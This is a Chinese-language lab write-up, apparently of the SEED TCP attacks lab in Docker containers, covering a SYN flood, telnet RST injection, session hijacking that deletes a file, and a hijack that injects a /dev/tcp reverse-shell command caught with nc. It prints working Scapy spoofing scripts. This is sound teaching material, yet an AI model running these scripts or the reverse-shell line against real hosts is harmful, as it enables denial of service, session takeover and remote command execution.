一、docker使用
docker換源:
vim /etc/docker/daemon.json
{
"registry-mirrors": ["https://docker.1panel.live"]
}
docker建立:
docker-compose build
docker開啟:
docker-compose up
ctrl+shift+T 新建一個終端
查詢docker狀態:
dockps
切換docker中的主機,例如:
docker exec -it victim-10.9.0.5 bash
二、實驗
Task1. SYN泛洪攻擊
檢視victim
sysctl net.ipv4.tcp_max_syn_backlog
netstat -tna
關閉SYNcookie
sysctl -w net.ipv4.tcp_syncookies=0
在seed(攻擊機)上,編譯synflood.c
gcc synflood.c -o synflood
切換到攻擊機
docker exec -it victim-10.9.0.5 bash
攻擊機目錄下volumes與seed機是共享的
使用攻擊機對victim進行攻擊
synflood 10.9.0.5 23
在victim上檢視網路狀態,發現出現了大量不明ip
稍等一小段時間後
在user1機上嘗試telnet連線victim
docker exec -it user1-10.9.0.6 bash
telnet 10.9.0.5
發現無法連線
wireshark分析資料包:
啟用syncookie,再次發動攻擊
sysctl -w net.ipv4.tcp_syncookies=1
發現
發現雖然還在持續收到syn包
但user1可以telnet連線到victim
Task2. 對Telnet的復位攻擊
利用seed-attacker作為攻擊機,user1作為客戶端,victim作為服務端
客戶端telnet到服務端
docker exec -it user1-10.9.0.6 bash
telnet 10.9.0.5
在主機中編寫好RSTattack.py(自動攻擊),透過volumes共享到攻擊機
#!/usr/bin/env python3
from scapy.all import *
def spoof_pkt(pkt):
ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
tcp = TCP(sport=23, dport=pkt[TCP].dport, flags="R", seq=pkt[TCP].seq+1)
pkt = ip/tcp
ls(pkt)
send(pkt, verbose=0)
f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-88413f1d34bf', filter=f, prn=spoof_pkt)
發現攻擊機中沒有python,但有apt
但是apt沒有源,機器也沒有vi,vim等文字編輯器
使用古老方法:
echo "deb http://mirrors.163.com/ubuntu/ precise main restricted" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise main restricted" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-updates main restricted" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-updates main restricted" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise universe" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise universe" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-updates universe" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-updates universe" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise multiverse" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise multiverse" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-updates multiverse" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-updates multiverse" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-backports main restricted universe multiverse" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-backports main restricted universe multiverse" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-security main restricted" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-security main restricted" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-security universe" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-security universe" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-security multiverse" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-security multiverse" >>/etc/apt/sources.list
echo "deb http://extras.ubuntu.com/ubuntu precise main" >>/etc/apt/sources.list
echo "deb-src http://extras.ubuntu.com/ubuntu precise main" >>/etc/apt/sources.list
不用全搞,實測搞幾個就可以了
更新apt-get源
apt-get update
apt-get install python3-pip
在攻擊機中執行檔案RSTattack.py
python3 RSTattack.py
在telnet連線的時候,隨便輸入一個字元(即傳送任意的資料包),就能被攻擊者篡改其中的標誌位,從而斷開連線。
Task3. TCP的會話劫持攻擊
將victim作為伺服器,user1作為客戶端,seed-attacker作為攻擊機。
在victim中新建new.txt
touch new.txt
echo "helloworld!" >>new.txt
在客戶機上telnet伺服器,檢視剛才建立的檔案“new.txt”
在攻擊機上用Python程式碼發起會話劫持攻擊,刪除伺服器上的“new.txt”
#!/usr/bin/env python3
from scapy.all import *
def spoof_pkt(pkt):
ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
tcp = TCP(sport=pkt[TCP].dport, dport=23,
flags="A",
seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
data = "rm -rf new.txt"
pkt = ip/tcp/data
ls(pkt)
send(pkt, verbose=0)
f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-51a3ed64a0eb', filter=f, prn=spoof_pkt)
在客戶機上使用剛才連線的telnet,看看有什麼情況,並請說明原因。
在伺服器上發現檔案刪除成功,並且客戶端的游標被鎖死,無法輸入命令。原因是客戶端的終端失去了正確的ack與seq,既無法發出資訊,也無法接收資訊,也無法退出。
Task4. 透過TCP的會話劫持攻擊建立“Reverse Shell”
編寫python程式
#!/usr/bin/env python3
from scapy.all import *
def spoof_pkt(pkt):
ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
tcp = TCP(sport=pkt[TCP].dport, dport=23, flags="A", seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
data = "/bin/bash -i > /dev/tcp/10.9.0.1/1234 0<&1 2>&1\n\0"
pkt = ip/tcp/data
send(pkt, verbose=0)
f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-51a3ed64a0eb', filter=f, prn=spoof_pkt)
在attacker上開啟監聽
nc -lnv 1234
user1上telnet到victim
再開一個attacher的bash,執行hijackingreverse.py
在user1的telnet連線中打一個空格
成功監聽,拿到shell
可以在攻擊機上遠端在victim上執行命令
